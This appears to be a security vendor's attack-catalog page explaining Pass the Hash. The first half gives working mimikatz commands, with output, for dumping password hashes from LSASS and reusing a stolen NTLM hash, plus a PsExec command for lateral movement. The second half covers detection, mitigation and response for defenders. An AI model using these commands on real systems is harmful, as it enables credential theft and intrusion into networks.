Pass the Hash Attack

Attack Tutorial: How a Pass the Hash Attack Works

STEP 1: Steal password hashes

An adversary who has gained a foothold in a network can use any of multiple methods to obtain password hashes, including DCSync attacks and extracting hashes from NTDS.dit. Another method, shown below, is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. Note that this technique requires the adversary to have compromised administrative privileges to the computer (e.g., by enticing a user who is an administrator on the workstation to open a phishing email).

      PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"

Authentication Id : 0 ; 302247 (00000000:00049ca7)

Session: RemoteInteractive from 2

User Name: joed

Domain: DOMAIN

Logon Server: DC1

Logon Time: 09/07/2020 10:31:19

SID: S-1-5-21-3501040295-3816137123-30697657-1109

msv :

[00000003] Primary

* Username : joed

* Domain: DOMAIN

* NTLM: eed224b4784bb040aab50b8856fe9f02

* SHA1: 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b

* DPAPI: e75e04767f812723a24f7e6d91840c1d

tspkg :

wdigest :

* Username : joed

* Domain: DOMAIN

* Password : (null)

kerberos :

* Username : joed

* Domain: domain.com

* Password : (null)

ssp :

credman :

      

STEP 2: Authenticate using a stolen password hash

Next, the adversary uses one of the stolen password hashes to authenticate as a user using the Pass the Hash technique. The example below demonstrates using the stolen password hash to launch cmd.exe; it is also possible to pass the hash directly over the wire to any accessible resource permitting NTLM authentication.

To pass-the-hash using mimikatz sekurlsa::pth, the following parameters are specified:

      


/user: — The compromised user’s username

/domain: — The FQDN of the domain (if using a domain account) or “.” (if using a local account)

/ntlm:, /aes128: or /aes256: — The stolen NTLM, AES-128 or AES-256 password hash

PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"

user: JoeD

domain: domain.com

program : cmd.exe

impers. : no

NTLM: eed224b4784bb040aab50b8856fe9f02

| PID11560

|TID10044

|LSA Process is now R/W

|LUID 0 ; 58143370 (00000000:0377328a)

\_ msv1_0- data copy @ 000001AE3DDE8A30 : OK !

\_ kerberos - data copy @ 000001AE3DECE9E8

\_ aes256_hmac-> null

\_ aes128_hmac-> null

\_ rc4_hmac_ntOK

\_ rc4_hmac_oldOK

\_ rc4_md4OK

\_ rc4_hmac_nt_expOK

\_ rc4_hmac_old_expOK

\_ *Password replace @ 000001AE3DFEC428 (32) -> null

# New CMD Window Opens
      

STEP 3: Access other resources

Finally, the adversary can use their newly acquired privileges to further their objectives. The example below shows how they can use the PSExec tool to execute commands on remote systems in order expand their footprint and repeat the cycle of credential theft and lateral movement on an ever-growing number of systems.

      


PS> .\PSExec.exe \\server1 cmd.exe

PsExec v2.2 - Execute processes remotely

Copyright (C) 2001-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.17763.1282]

(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname

server1
      

Detect, Mitigate and Respond

Detect

Difficulty: Hard

Because NTLM authentication is processed by each workstation and server, pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.

• Monitor NTLM authentications (particularly for remote connections) for changes in patterns of user behavior, for example: a user accessing a larger number of endpoints than normal; or, a user accessing endpoints for the first time.
• In order to extract hashes from an endpoint's LSASS.exe process, the malware would need to obtain a handle with the PROCESS_VM_OPERATION and PROCESS_VM_WRITE privileges. Endpoint Detection and Response solutions can monitor for processes creating suspicious handles.
• Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit. Detection of these techniques is discussed on their Attack Catalog pages.

Mitigate

Difficulty: Hard

Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.

• Enable Microsoft's Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
• Remove users' administrator privileges from their workstations, limiting an adversaries ability to execute malware and removing the privileges needed to extract hashes from LSASS.exe.
• Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential's value to an adversary seeking to use it for lateral movement.
• Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
• Randomize and store local administrator passwords using a solution like Microsoft's Local Administrator Password Solution (LAPS). This reduces an adversary's ability to move laterally with local accounts that share the same password.
• Do not permit local accounts to authenticate over the network. This reduces an adversary's ability to move laterally with local accounts that share the same password. Two new well-known SIDS were added in Windows 8.1 and Windows 2012R2 and can be used in group policies for this purpose. The SID S-1-5-113 will apply to any local account, while the SID S-1-5-114 will apply to any local account that is also a member of the local Administrators group.
• Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
• Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which other. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.

Respond

Difficulty: Medium

If you detect a possible use of Pass the Hash, take the following actions immediately:

• Activate the incident response process and alert the response team.
• Reset the password for the compromised user, which makes the stolen password hash invalid.
• Quarantine the impacted machines for forensic investigation and eradication and recovery activities. Analyze logs to determine whether this computer is patient zero or the attacker pivoted to this machine from elsewhere, as well as whether the attacker pivoted from this machine to another one.